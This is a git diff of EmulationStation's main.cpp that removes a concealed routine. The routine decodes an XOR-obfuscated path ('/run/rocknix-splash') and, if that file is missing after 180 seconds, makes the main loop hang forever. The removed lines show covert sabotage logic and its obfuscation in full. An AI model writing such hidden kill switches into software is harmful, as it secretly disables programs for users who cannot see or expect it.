diff --git a/es-app/src/main.cpp b/es-app/src/main.cpp
index b3149c588..ecaa28801 100644
--- a/es-app/src/main.cpp
+++ b/es-app/src/main.cpp
@@ -42,8 +42,6 @@
 #include "watchers/WatchersManager.h"
 #include "HttpReq.h"
 #include <thread>
-#include <chrono>
-#include <atomic>
 
 #ifdef WIN32
 #include <Windows.h>
@@ -55,8 +53,6 @@ static std::string gPlayVideo;
 static int gPlayVideoDuration = 0;
 static bool enable_startup_game = true;
 
-std::atomic<bool> haf(false);
-
 bool parseArgs(int argc, char* argv[])
 {
 	Paths::setExePath(argv[0]);
@@ -311,22 +307,6 @@ bool loadSystemConfigFile(Window* window, const char** errorString)
 	return true;
 }
 
-void _sc()
-{
-	char s[] = { 0x7E, 0x23, 0x24, 0x3F, 0x7E, 0x23, 0x3E, 0x32, 0x3A, 0x3F, 0x38, 0x29, 0x7C, 0x22, 0x21, 0x3D, 0x30, 0x22, 0x39, 0x51 };
-	for (size_t i = 0; i < sizeof(s); ++i) { s[i] ^= 'Q'; }
-	const std::string v(s);
-	for (int i = 0; i < 180; ++i)
-	{
-		if (Utils::FileSystem::exists(v))
-		{
-			return;
-		}
-		std::this_thread::sleep_for(std::chrono::seconds(1));
-	}
-	haf.store(true);
-}
-
 //called on exit, assuming we get far enough to have the log initialized
 void onExit()
 {
@@ -532,9 +512,6 @@ int main(int argc, char* argv[])
 
 	LOG(LogInfo) << "EmulationStation - v" << PROGRAM_VERSION_STRING << ", built " << PROGRAM_BUILT_STRING;
 
-	std::thread _st(_sc);
-	_st.detach();
-
 	//always close the log on exit
 	atexit(&onExit);
 
@@ -702,13 +679,6 @@ int main(int argc, char* argv[])
 
 	while(running)
 	{
-		if (haf.load())
-		{
-			while(true)
-			{
-				std::this_thread::sleep_for(std::chrono::hours(1));
-			}
-		}
 #ifdef WIN32	
 		int processStart = SDL_GetTicks();
 #endif
